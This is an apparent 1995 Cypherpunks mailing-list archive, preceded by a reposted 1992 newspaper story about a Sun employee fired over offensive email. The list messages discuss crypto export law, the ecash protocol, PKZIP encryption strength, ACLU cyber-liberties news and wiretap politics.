 (from the Business section of the San Jose Mercury News,
Friday, July 31, 1992)
"Email epithets spark Sun lawsuit" by Brandon Bailey
 By his own admission, Philip Stromer liked to push the
boundaries of good taste when he sent out jokes and
political statements on his employer's electronic mail network.
 But according to a lawsuit filed this week in Santa
Clara County Superior Court, Stromer pushed too far.
 The 32-year-old technical writer says he was fired by
Sun Microsystems in April after he sent a series of
email messages that were anything but politically correct.
 The messages were posted on an electronic bulletin
board used by Sun workers to exchange jokes and
running commentary on a variety of topcis unrelated to their jobs.
 "I was just trying to make conversation," Stromer
said in an interview.  "I would normally take whatever position was unpopular."
 His electronic broadsides ranged from pro-Israel
and anti-abortion arguments to jokes about AIDS
and graphic epithets about gays.  Eventually he
signed on to a nationwide computer network using
his terminal at Sun and typed what he described
as "some very extremely nasty stuff" on a bulletin
board used primarily to exchange sarcastic insults and vitriolic humor.
 A Sun spokeswoman said the company would not comment.
 The case raises interesting questions about the
increasing popularity of electronic bulletin
boards and message systems on which users can
type all kinds of outrageous statements without
having to look their audience in the eye.  Stromer
says he always signed his own name to his messages
and never meant to threaten anyone personally.
But several legal experts say that anti-discrimination
laws require management to step in when employees
create an atmosphere that is hostile or intimidating to any group.
 "An occasional joke, maybe," said Patricia Shiu, staff
attorney at the non-profit Employment Law Center in
San Francisco.  "But if an employer (allows) that kind
of thing repeatedly, he exposes himself to liability
for allowing a discriminatory environment."
 In his lawsuit, Stromer claims his bosses violated his
right to free expression.  He said he was just trying
to liven up the conversations that Sun employees routinely
conduct on a variety of email bulletin boards.  And he
compared himself with comedian Lenny Bruce.  (Stromer
said he had been scolded before but he drew his first
written reprimand from Sun for a joke about AIDS and
Magic Johnson, and another about AIDS and anal sex.)
"This type of exchange... is deemed by Sun management
to show poor judgment and blatant disregard for the
feelings of coworkers," said the reprimand.
 By Stromer's account, he was fired after he used his
work computer to hurl messages including graphic epithets
at gays across a national network.  The network automatically
identified the messages as coming from a Sun computer.
 Stromer is acting as his own attorney.  He said he sought
help from the American Civil Liberties Union and a
conservative foundation but both told him his employer
had a right to regulate his speech on company computers.
= = =
[Typed in by sf at dec and reposted w/o his permission, which is why
I'm leaving his name off / JBL]
--
 Aha. So _that's_ the reason he ceased to infest alt.flame! I just thought that
his net access had been stripped, like a kook of a different stripe (I'm
referring to the dreaded David J. Rasmussen, of course), but I probably
just ran into his post-Sun output instead.
One does wonder how working for a company justifies the posting of such
crapola via a system the company owns. Ah well...
============================================================================

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From jsimmons at goblin.punk.net  Wed Nov 22 16:18:09 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Thu, 23 Nov 1995 08:18:09 +0800
Subject: Spam the Sign!
In-Reply-To: <Pine.SUN.3.91.951122145559.24028D-100000@viper.law.miami.edu>
Message-ID: <199511230002.QAA01527@goblin.punk.net>


> > >[regarding suggestion that netscape give mit or someone a 128 bit version 
> > >to place on an ftp server]
> > >
> > >This is not an apology for the the ITAR, just my usual lawyerly overcaution:
> > >
> > >Suppose A gives B a program that is export controlled, intending for B to 
> > >allow it to be exported.  Has A conspired with B to export the program?
> > >
> > >Let's ask the grand jury investigating Phil....
> > 
> > That's a possible problem, I suppose, but wouldn't you be protected if
> > your license agreement with MIT (or whoever) specified redistribution
> > "for domestic use only"?
> > 
> "protected"? No.  "Helped"? Yes.  The government can argue to the jury 
> that the agreement was a sham and you knew it....

(Great, I'm about to argue law with a REAL LAWYER (tm).  And they promised me
that Cypherpunks wouldn't cause brain damage ... )

OK, suppose A does NOT intend for B to export it, and he does anyway ...

Now suppose that instead of giving it to B, he SELLS it to him ...

So a pirated copy of the commercial version of Netscape's Navigator shows
up in a Hong Kong flea market, and Barksdale goes to jail ...

(Members of the jury, Mr. Barksdale MUST have known that one of his millions
of paying customers would export that dangerous munition ...)

The logical ludicrousness of ITAR shows up fast no matter which angle you
look at it from, and yet the people with the <exonized for your protection>
to actually challenge it aren't the big companies who stand to gain the
most financially, it's a bunch of guys (a lot of whom hang around here
sometimes) who are successfully giving away 'export controlled' software,
while the people with the resources to really fight this thing sit on the
sidelines waiting for Phil Zimmerman or Phil Karn to get them off the hook
so they can go and make a lot of money.

It seems to me that there's something very wrong with this picture, and while
I don't mean this in any way to be taken personally, one of the big things
I see as wrong is overcautious lawyers.

-- 
Jeff Simmons                           jsimmons at goblin.punk.net





From yihchun at u.washington.edu  Wed Nov 22 16:46:54 1995
From: yihchun at u.washington.edu (Yih-Chun Hu)
Date: Thu, 23 Nov 1995 08:46:54 +0800
Subject: Q: Bookshop in Seattle
In-Reply-To: <9511112134.AA29395@pulm1.accessone.com>
Message-ID: <Pine.OSF.3.91l.951122161727.10225A-100000@saul2.u.washington.edu>



This may be a bit late...
I just picked it up from UBS for $49.95. It's ordered at B&N for $39.95
I think.

On Sat, 11 Nov 1995 blancw at accessone.com wrote:

> 
>   Can someone point me towards a bookshop in Seattle that is likely to
> have the second edition of Applied Cyptography ? 
> .......................................
> 
>  Tower Books (I've seen it advertised there)
>  The University BookStore (probably)
>  Barnes & Noble (potentially)
> 
> 
>   ..
> Blanc
> 
> 
> 

+---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun at cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun at u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+






From hfinney at shell.portal.com  Wed Nov 22 17:24:23 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 23 Nov 1995 09:24:23 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511230103.RAA15911@jobe.shell.portal.com>


Ian Goldberg <iang at cory.EECS.Berkeley.EDU> writes:

>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>I have a binary, which I can't even run...).  

>I've managed to decipher a useful bit of the first message sent from
>the shop to the payer.  It's the Payment Request, and contains the following
>information:

>o Header identifying packet as Payment Request
>o The integer 4
>o The payment amount, in cents
>o The time (seconds since 1970)
>o The integer 79
>o The name of the shop (payee)
>o A description of the item being paid for
>o An empty string
>o The integer 0
>o End of Record marker

That's very interesting work!  What are the string formats, are they null
terminated or Pascal-style with a preceding count byte?  How did you
identify "an empty string", wouldn't that just be a byte of 0?  How did
you know it was an empty string rather than just a 0.

Did you get this by inducing a shop to send a payment request message to
some program you wrote which was listening on the ecash port?

I think a good way to get the rest of the information would be with a
proxy which logged message traffic.  I know ecash has some proxy support
but I'm not sure how it works.  There are SOCKS proxies and http proxies,
and I don't know which it uses.  I used a logging httpd proxy to derive
the data for the SSL challenges I did this past summer.  It might be
interesting to post the binary data from some ecash transactions.

>I guess the important bit is that the payee, the item being bought,
>and the cost are sent _in the clear_.  Some of the people I've talked
>to think this is a huge privacy breach, and some don't.  You all can
>debate this now.  Lucky can, if he wishes, add insight, and/or tell us
>what DC may do about this.

I wonder if it would be legal to write shop software which sent such a
payment request, took the resulting coins, and deposited them in the bank
(if we could figure out all the protocols necessary).  This particular
sequence of operations would not appear to infringe anybody's patents -
there are no blinding operations involved.  It's not clear how useful
such a program would be but at least it would be one step away from the
DigiCash monopoly.

Hal





From ACLUNATL at aol.com  Wed Nov 22 17:34:39 1995
From: ACLUNATL at aol.com (ACLUNATL at aol.com)
Date: Thu, 23 Nov 1995 09:34:39 +0800
Subject: ACLU Cyber-Liberties Update -- 11/22/95
Message-ID: <951122180144_114185619@mail06.mail.aol.com>


----------------------------------------------------------------
November 22, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
IN THIS ISSUE:

*     New York Civil Liberties Union Opposes Discipline of Cornell Students
for Offensive Online Speech

*     Seattle Negotiates New Franchise Agreement with Cable Network to Offer
Internet Access; ACLU of Washington Gives Testimony on Privacy Implications

*     Watch Out for Cyber-Liberties Infringements in Counter-Terrorism
Legislation; House May Consider Bill in Early December

*     Update and ACTION ALERT on Federal Online Indecency Legislation

*     Online Discussion Groups on Electronic Access Issues

----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
----------------------------------------------------------------
* New York Civil Liberties Union Opposes Discipline of Cornell Students for
Offensive Online Speech

The latest controversy over appropriate use of the Internet at universities
erupted last week after four Cornell students made a list of "75 reasons why
women should not have freedom of speech" and the list got loose on the
Internet.  Responding to e-mail and phone complaints about the message,
Cornell considered disciplinary action against the students.

The NYCLU wrote a letter to Cornell on Thursday, November 16th, urging
Cornell not to proceed with disciplinary action.  The letter said, "Freedom
of expression, especially in the academic forum, is designed to encourage
truth-seeking by protecting the challenge and response of intellectual
discourse. . . .  It is understandable that university officials should be
concerned about the increase in the use of sexist language. . . .  However,
no matter how troubling or offensive the message is, the administration of
Cornell University should not depart from principles of freedom of expression
when addressing the issues surrounding this dispute."  The letter went on to
note that "the marketplace theory of free expression appears to be in full
swing as the wrong-minded e-mail message has apparently already provoked
 thousands of angry messages' both to Cornell and to the particular four
students."

On Thursday afternoon, Cornell announced that it would not pursue any
disciplinary action against the students.

For a copy of the letter that NYCLU sent to Cornell, send a message to
infoaclu at aclu.org with "NYCLU Letter to Cornell" in the subject line.  For
more information, contact Beth Haroules, Staff Attorney, NYCLU, at
212-382-0557.

----------------------------------------------------------------
*     Seattle Negotiates New Franchise Agreement with Cable Network to Offer
Internet Access; ACLU of Washington Testifies at Hearing on Privacy
Implications

Cities across the country are beginning to renegotiate franchise agreements
with cable networks who want to get into the Internet access business.  Civil
libertarians must work to ensure that strong privacy protections are included
in these agreements.

The City of Seattle is currently negotiating a new franchise agreement with
TCI of Seattle, Inc., and the ACLU of Washington urged the city to include
provisions to protect consumer privacy.  In a letter dated November 9th,
ACLU-W said that "franchisees should be prohibited from collecting any data
on individual use of the cable network, including Internet access, except
that data minimally needed for billing purposes. . . .  [T]he franchisee
should be precluded from collecting information about which other Internet
sites are accessed through the cable network, which newsgroups are read,
which real-time interactive forums are participated in, or any other
information that could be used to compile a data profile of the subscriber."
 The letter also urged the city to require technological protections, like
encryption, to guard against unauthorized tapping.

For a copy of the letter, send a message to infoaclu at aclu.org with "cable
franchise agreement" in the subject line.  For more information, contact Doug
Klunder, ACLU-W Information Technology Committee, dougk at eskimo.com.

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------
*     Watch Out for Cyber-Liberties Infringements in Counter-Terrorism
Legislation; House May Consider Bill in Early December

The House of Representatives is scheduled to debate a broad counter-terrorism
bill in early December.  (The Senate passed a similar bill in June 1995.)
 While the counter-terrorism bill contains many unconstitutional provisions,
the net community should be particularly alert to the following:

1.  The pending House counter-terrorism bill contains a funding mechanism for
vastly expanded wiretap capabilities for federal law enforcement (authorized
by the Digital Telephony law passed by Congress last year). The FBI's scheme
would give government an unprecedented ability to intrude on privacy through
increased wiretaps.  The net community should oppose this and any other
funding scheme for the FBI's wiretap proposal.  (See our 11/8 issue of the
Cyber-Liberties Update for an ACLU statement and action alert on the federal
wiretap proposal.)

2.  The version of counter-terrorism legislation already passed by the Senate
contains a revised Feinstein Amendment, which makes it a felony "to
distribute by any means information pertaining to, in whole or in part, the
manufacture of explosive materials, if the person intends, or knows that such
explosive materials or information will likely be used for" criminal
purposes.  While the legislation applies to all media, it grew out of Senator
Feinstein's vilification of the Internet at the Senate's May 11th
counter-terrorism  hearings.  The House version of counter-terrorism
legislation does not currently contain language like the Feinstein Amendment,
but the online community should stand ready to oppose any effort to include
such unconstitutional provisions in the final House bill.

For a copy of the ACLU's letter to the Senate in opposition to the original
Feinstein Amendment, send a message to infoaclu at aclu.org with "Feinstein
Amendment" in the subject line.

For further information on the ACLU's opposition to counter-terrorism
legislation (which would also expand the FBI's powers in electronic
surveillance and other areas), visit the ACLU's Constitution Hall on America
Online, at keyword ACLU.

----------------------------------------------------------------
*     Update and ACTION ALERT on Federal Online Indecency Legislation

The Conference Committee on the telecommunications bill is currently
considering whether to remove provisions that would make "indecency" and
other speech a crime in cyberspace.  The Christian Coalition and other
anti-free-speech groups continue to heavily lobby the Conferees to make the
new speech crimes even stricter than the Exon Amendment.  To counter this
backlash, the online community must overwhelm the Conference Committee with a
loud and clear message -- that parental empowerment tools and not big
government censorship are the only effective means to address children's
access to online content.

While the Conference Committee is home for Thanksgiving, we urge you to call
the Conferees in your state.  To find a list of the home office phone numbers
for the Conferees, see the current ACTION ALERT at http://www.vtw.org/

The ACLU continues to prepare for a constitutional challenge to the online
censorship provisions if they become law.  Please contact Ann Beeson,
beeson at aclu.org, if your organization is interested in being a plaintiff in
this ground-breaking litigation that will define First Amendment rights in
cyberspace.

----------------------------------------------------------------
Online Discussion Groups on Electronic Access Issues
----------------------------------------------------------------
The following discussion groups are actively debating government information
and access issues:

GOVPUB -- issues related to publishing local and state government information
online
Subscribe: listserv at vm1.nodak.edu
Message: subscribe govpub

GOVACCESS -- citizen access to government information
Subscribe: majordomo at well.dom
Message: subscribe govaccess

PUBPOL-D -- substantive discussion of public policy issues
Subscribe: listserv at vm1.spcs.umn.edu
Message: subscribe pubpol-d [your name]

COMMUNET -- issues related to community and civic networks
Subscribe: listserv at uvmvm.uvm.edu
Message: subscribe communet [your name]

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson at aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu at aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu at aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu at aclu.org.
----------------------------------------------------------------





From rsalz at osf.org  Wed Nov 22 17:35:26 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 23 Nov 1995 09:35:26 +0800
Subject: "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID: <9511220155.AA28801@sulphur.osf.org>


I've heard a couple of media interviews (CNBC Equal Time, and NPR
Talk of the Nation).  It sounds like a good collection of issues and
scare stories.  Experienced people on this list might learn a few things
to round out the overall picture, but it's probably best for the general
public.  I hope it does real well.





From perry at piermont.com  Wed Nov 22 17:36:51 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 23 Nov 1995 09:36:51 +0800
Subject: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <199511220307.WAA18256@jekyll.piermont.com>



Weld Pond writes:
> [ Pedophiles use encoding devices to make secret use of Internet ]
> Story in Nando Times
> 
> http://www2.nando.net/newsroom/ntn/info/info429_4.html

Somewhat inevitable. Doubtless it will be used by the FBI and others
as ammo.

Perry





From jsw at netscape.com  Wed Nov 22 17:43:43 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 23 Nov 1995 09:43:43 +0800
Subject: Spam the Sign!
In-Reply-To: <199511210121.RAA02291@goblin.punk.net>
Message-ID: <30B28651.57A@netscape.com>


sameer wrote:
> 
> >
> > And as far as needing government approval, I noticed that Sameer has an
> > export controlled ftp server at c2.org.  Maybe he could tell us what is
> > necessary to setup such an animal.
> >
> > --
> 
>         I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> and sed. I didn't get the NSA to approve it, but I figure if it's good
> enough for RSADSI it's good enough for me.

  Do you have a legal opinion to support this statement?  Our lawyers
tell us that executives of netscape could go to jail if we make the
128bit version of netscape available from an "export controlled"
ftp or http server.  We are working to clarify the situation with
the government or figure out an alternative distribution scheme that
will remove us from the grey area.

  Getting the US version of netscape widely available is one of my
highest priorities, but I can't tell Barksdale that he should go to
jail over it.  I'm constantly pushing from within the company to keep
things moving forward.

  In the mean time I appologize to the linux users who can't even
buy the 128 bit version.  If something changes on this front I'll
be sure to let people know.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From perry at piermont.com  Wed Nov 22 17:48:11 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 23 Nov 1995 09:48:11 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <acd75bfd090210044420@[205.199.118.202]>
Message-ID: <199511220216.VAA18082@jekyll.piermont.com>



Timothy C. May writes:
> At 4:05 PM 11/21/95, Peter Wayner wrote:
> >Has anyone ever done the math on the FBI's new wire tapping
> >proposals and determined whether they'll have enough agents to
> >do all of the listening?> ...
> 
> The manpower shortage can be solved by moving the listening step offshore,
> perhaps to one of the Carribbean islands that processes credit card slips.

Am I the only person who thought that the point was to be able to
selectively target certain areas but not necessarily all areas? For
instance, lets say the known criminal Tim May is going to be in some
place for a while -- by conducting roving taps of all conversations, I
can find him. 1% capacity should be enough to make that practical. As
another example, lets say there is some sort of political insurgency
building up in some city -- presumably, one could devote all one's
roving manpower to just that place for a few weeks and crush it.

I can see no conventionally legitimate need or way to exploit the
capability, but with unconventional and illegitimate techinques...

Perry





From hallam at w3.org  Wed Nov 22 17:51:45 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 23 Nov 1995 09:51:45 +0800
Subject: "Dear Newt" Letter...
In-Reply-To: <199511220100.UAA17883@jekyll.piermont.com>
Message-ID: <9511220208.AA29462@zorch.w3.org>



>And what did any of the Democrats do?

>Anyone who thinks that Democrats are "better" for privacy and personal
>freedom than Republicans has probably been taking very high quality
>drugs indeed. A Democratic president has been pushing Clipper --
>Senator Exon is a Democrat.

Yes and Coates is a Republican, Meanwhile Grassley and Dole have a parallel set 
of lossage. Incidentaly on the Exon-Coates ammendment, look into the connections 
between Rimm and the Christian right. The legal footnotes were apparently 
drafted by legal council for the Christian Coalition. Granted there are few 
friends of the Christian Right's manifesto on the Internet, I personally 
consider them an entryist group which the Republicans should recognise as a 
liability. 

The point was that the original post made the assumption that the Republicans 
were somehow differentiated from the Democrats on this. Its simply not true. 
Clipper was started under Bush (or possibly Regan) and Clinton carried it over 
without change. I don't see any sign at present that a Republican president 
wouldn't simply continue as well.

The only way something is going to get done is if the Clipper program gets 
labeled with the "take out with the trash" tag. Essentially there are always a 
whole series of civil service initiatives that continue from administration to 
administration that everybody knows are looser ideas but it is easier to 
continue with them than give the opposition an opportunity to claim that it was 
a retreat. It sounds (and is) a stupid way to do politics but that is the way it 
works. For some reason the american people consider stopping a bad policy to be 
a "flip-flop" and hence something which demonstrates the unfitness of the office 
holder, just as willingness to negotiate is "vacillation". 

Its not a new principle. Clinton axed a whole raft of programs that the Bush 
adminstration had realised were losers but had continued for the same reason.

What you have to avoid here is making the issue one of party politics. First off 
you will lose because you will bet on the losing side at least half the time. 
Secondly policies that get into the party political arena end up being treated 
in an absolutist and ideological manner which prevents any common sense input. 
You are likely to find both sides taking positions you don't like simply because 
it is advantageous politically.

Secondly you are likely to win the argumkent in the Congress and then lose it in 
the Whitehouse. The next administration will be either Dole or Clinton, more 
likely Clinton because Dole is a fossil and the next election will not be about 
the second world war or the cold war, it will be about responding to new 
technology. Neither Dole nor Clinton is likely to respond well to a mandate from 
congress concerning issues of national security. That is the card the FBI will 
play. The NSA have their own card but none of us know what their real concern 
is.

What I am saying is that we must not allow the Congress to attempt to beat up 
the Whitehouse. They simply do not have leverage on this issue. No President 
will overule the experts on a matter of National security lightly, if it is a 
partisan congressional mandate it will be much easier to reject.


A much better strategy is to portray the FBI as being a rogue agency acting 
outside their brief. The debate must be turned from a simple question of privacy 
versus national security which you will lose regardless of which party is in 
power to one of ecconomic security versus short term national security. You need 
to point out the ecconomic cost of insecure communications. You have to bring to 
light the behaviour of the French for example. Make it clear that US companies 
are loosing business because the French regularly tap fax communications.
Make it clear that encryption is essential to provide high grade protection 
against hackers.


The privacy issue may be what drives cypherpunks but it is not the argument 
which will work in the arena you need to be heard in. They do not care about 
privacy, most particularly not protection against government intrusion. They are 
not even that concerned about protecting individuals privacy against corporate 
abuse.

If you make it a party issue you will not only lose but risk turning the clock 
the other way. At the moment everyone knows that the export control laws are not 
stopping people from getting PGP. It is not a good idea to rub peoples noses in 
it. It is easy to ignore export violations by turning a blind eye. It is 
difficult to turn a blind eye when people are so anxious to announce what is 
going on. Phil Z. is not having problems because he wrote PGP, he is having 
problems because he made sure the FBI couldn't pretend they did not know what 
was going on.

If you make encryption a party issue then one of those Grassley bills will pass 
and the President in power may not veto it.


		Phill





From dekel at carmel.haifa.ac.il  Wed Nov 22 17:51:58 1995
From: dekel at carmel.haifa.ac.il (L. DEkel)
Date: Thu, 23 Nov 1995 09:51:58 +0800
Subject: PKZIP - Encryption
Message-ID: <Pine.A32.3.91.951122035639.51855A-100000@carmel.haifa.ac.il>



                PKZIP Encryption - Practical approach
                =====================================

Note: I am discussing PKZIP ver. 2.xx encryption,
but the abstracts isn't about a particular encryption.


ABSTRACT:

        Practical security often differs from Theoretical security.
If I asked you, would you make the effort of renting a box at the bank's safe
for putting only $1 inside, then when you want it you'll have to drive to town,
at opening hours, and be escorted by an armed guard to the safe, just to get
the $1, I can guess what your answer will be.
        The same thing goes for Cryptography, What you are trying to protect,
it's importance, price, value, determines the steps you would be wiling to take
to ensure a safe and strong encryption.
        If you want to hide a game from your kid brother, you can use some
basic algorithm of encryption (say XOR), but say want to hide proofs that you
killed someone you better use a stronger algorithm (say IDEA).

To conclude: The system you should choose for security depends on:
1. How sensitive is the data you want to hide.
2. Who is the potential cracker of your system.
3. How convenient is the Crypto system for use. (*)
  (*) This is not so trivial, as security = 1/convenience, you can, for example
    force users to change their passwords every 2 min. very secure, but that
    not very Practical.


PKZIP Encryption:

PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
Maybe it's time to put things in the right perspective.

One must realize (yet again) the difference between:
Theoretical Cryptography - and - Practical Cryptography:

>From the Theoretical side, there is an excellent article:
"A Known Plaintext Attack on the PKZIP Stream Cipher", by Eli Biham and
Paul C. Kocher., that proposes an attack on the algorithm using known plaintext
method. The writers come to the conclusion that: "The PKZIP cipher is weak,
and should not be used to protect valuable data".

Criticism:

0). Only the you can define what is "valuable data" for yourself,
    this could be an abstract question.
    [see above ABSTRACT discussion]
1). The proposed attack is largely Theoretical, in "laboratory conditions",
whereas a ciphertext-only attack, more like what we often find in the real
world, is Harder.
The article doesn't propose any effective ciphertext-only attack.
(It seems the writers only tried to give a general assessment of the algorithm
strength, which they did very well).

Note: A Very limited Known-plaintext attack is possible against PKZIP,
as specific information about the Header of the archive file is Known,
but this attack is of complexity 2^38 or higher, so it's not very effective,
however it is a possible for an expert Cryptanalyst. (This is still Easier
than ciphertext-only attack - we meet in the street).
        Thus, the theoretical attack is good in telling us about the encryption
algorithm, it's strength and weaknesses, and knowledge is always better then
ignorance, But, in real world, such an attack can be rendered ineffective, or
impractical in terms of resources consumed, time spent, money etc.
        Don't get the wrong impression, in general, Cryptographic research is
Good, it helps determine the overall strength of an algorithm, make suggestions
as to possible improvements, warn against weak keys, back-doors etc. But we
must separate the Practical from the Theoretical, and it works both ways too.
        A one-time-pad (OTP) for example, is considered theoretically
unbreakable, but in practice OTP systems has been broken more than once, as
long as there are people making Human mistakes: loosing secret keys, encryption
a message with the OTP more than once, etc.
So: Theoretical encryption strength != Practical encryption Strength

2). Considering the "many" cracking utilities in the market:
there is almost NO ready made, software that really crack the PKZIP algorithm
(crack = cryptanalysis, that is Really analyzing the algorithm, not guessing
games), in fact there is No software that can really crack Any modern
algorithm such as DES, IDEA etc, That is except maybe CBW which is the closest
thing to Really cracking the crypt(1) for unix, or some commercial products
for cracking WordPerfect encryption or so. (The strength of PKZIP 1.xx/2.xx
encryption is much greater than the above crypt(1) and WordPerfect).

        All the "Great" utilities are just fancy passwords guessers at best,
none of them analyze the ciphertext.
True, some of them are good guessers, but their "strength" depends on the
Weakness of the password (password = The cryptographic Key).
The stronger the password the less chance the "cracker-util" will crack it.
The best crackers in the market performs a "limited" brute force attack,
if they are good. "limited" is referred to "dictionary attacks", such as the
cracker doesn't perform a complete Keyspace (brute-force) search, instead it
perform a "Subset keysapce search", i.e. choosing some elements of the
Keysapce (say english words) and trying them. (There is the option, in some
crackers, including crackers for PKZIP, such as FZC, to perform a more
"orderd" Keyspace, that is checking sequences of Keys, e.g: All-5-uppercase
letters only- keys).
The conclusion from this section is, that if you choose a Long enough, Hard to
find (say random chars) password such as "x at J60!fv_Zd4%", then you are quite
safe from these "horrid" crackers.
That last statement is good for choosing passwords in general.

Final note:
PKZIP is not a crypto system it's an Archiver with a password protection 
option. If You want to protect your secret cherry cake recipe from your 
mother, you can safely use PKZIP protection (assuming your mother isn't a 
top cryptographer working for NSA). If you want to hide the formula for 
Cold fusion - use PGP.


And remember, there is always the "rubber hose" cryptography option.
,,,,,
DEkel
'''''







From karlton at netscape.com  Wed Nov 22 17:53:38 1995
From: karlton at netscape.com (Phil Karlton)
Date: Thu, 23 Nov 1995 09:53:38 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <30B3CE64.6BF2@netscape.com>


Alice (or someone representing themselves as Alice) said:

> What I'm trying to say is that if someome posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independantly of the knowledge they have garnered from
> watson.

And that is understable.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

This is a complete non sequitur. See if you can follow this: only those
authorized by the company to speak for the company are authorized speak
for the company.

There is a genuine difference between a corporate officer saying

	The Amalgamated Widget corporate policy on stong crypto is ...

and some engineer from Amalgamated Widget saying

	My private opinion on strong crypto is ...

The consequence of every statement by every employee being taken as
company policy is that every employee (except for public relations) will
be prohibited from contributing to any public forum or even answering
apparently innocuous questions on the net. This would not be a desirable
outcome.

Still speaking for myself,
PK
--
Philip L. Karlton		karlton at netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications





From s1113645 at tesla.cc.uottawa.ca  Wed Nov 22 17:54:58 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 23 Nov 1995 09:54:58 +0800
Subject: PGP in Canada
In-Reply-To: <9511221544.ZM6977@glacius.alias.com>
Message-ID: <Pine.3.89.9511222044.B25201-0100000@tesla.cc.uottawa.ca>




On Wed, 22 Nov 1995, Richard Martin wrote:

> It is legal for a Canadian citizen to import PGP into Canada
> under Canadian law. It is legal to use either the international
> or yanqui versions in Canada--software patents don't apply [I
> don't think].
Yup. RSA's only patented in one country- the USA. Though maybe with NAFTA...?

> It is *illegal* for a Canadian to export pgp anywhere except the
> U.S., if the pgp came from the U.S. and no substantial changes
> have been made to it.

All the same if it was freeware crypto software and completely written 
outside the US, I'm under the understanding that you can export without a 
license. IANAL, I may be wrong. Do double check.

Do mail the export controls division of external affairs and
ask for "Canada's Export Controls", the "General Software Note" and
a specific opinion regarding the exportability of pgp, US crypto,
non-US crypto and freware vs. commercial wares. They also hadn't
made up their mind as to whether ftp constituted export.

They have branches in all major Canadian cities, so I'll mail the nearest
addresses to those who are interested (I'm not at home right now).

> My recommendation: get the international version of PGP. [Unless, of
> course, the above statements are wrong, in which case my reasoning
> in favour of the international version are faulty.]

Sorry to say, it would be pointless, you wouldn't be able to export it from 
here unless it was totally rewritten outside the US (which it I take it 
it isn't, right?)






From jya at pipeline.com  Wed Nov 22 18:14:21 1995
From: jya at pipeline.com (John Young)
Date: Thu, 23 Nov 1995 10:14:21 +0800
Subject: The Mesh and the Net
Message-ID: <199511230141.UAA02365@pipe4.nyc.pipeline.com>


SciAm's December article on future high-tech carnage cites:

"The Mesh and the Net: Speculations on Armed Conflict in a
Time of Free Silicon," by Martin C. Libicki, March, 1994. 
(233kb)

Available on the Web at:

<http://www.ndu.edu/ndu/inss/macnair/mcnair28/m028cont.html>

NDU is the National Defense University, Libicki's teat.

He is quoted: "We're getting a lot of clever ideas about how
to fight a Gulf War more efficiently, but we rarely get
anything about how to fight a Vietnam more efficiently."

Here are excerpts from his preface:

   Mesh -- the term applied to military applications --
   points to the holes; as information technology places a 
finer mesh
   atop the battlefield, more objects are caught in it. Net -- 
the term
   applied to civilian applications -- points to the substance 
of the
   system; the connectivity of people and their machines 
suggests new
   patterns of social relationships and new venues for 
conflict. Silicon,
   that which is to become free, stands for both semiconductor 
chips (for
   computation) and optical fibers (for communications).
   
   Argument: The relationship of the once and future revolution 
in
   information technology to warfare is analyzed in several 
steps:
   
     * Chapter One outlines the basis for this revolution and 
explains
       why its most natural expression is the dispersion rather 
than
       accumulation of information power.
       
     * Chapter Two examines its expression on the battlefield 
in three
       aspects: Pop-up warfare, the rise of the Mesh, and the 
evolution
       of Fire-ant warfare.
       
     * Chapter Three examines whether the revolution on the 
battlefield
       translates into a commensurate revolution in military
       organization.
       
     * Chapter Four discusses implications for acquisition, 
research and
       development.
       
     * Chapter Five extends the analysis to the case of 
low-intensity
       conflict.
       
     * Chapter Six attempts a broader assessment of how 
civilian
       applications of information technology, the Net, may 
affect
       national security.
       
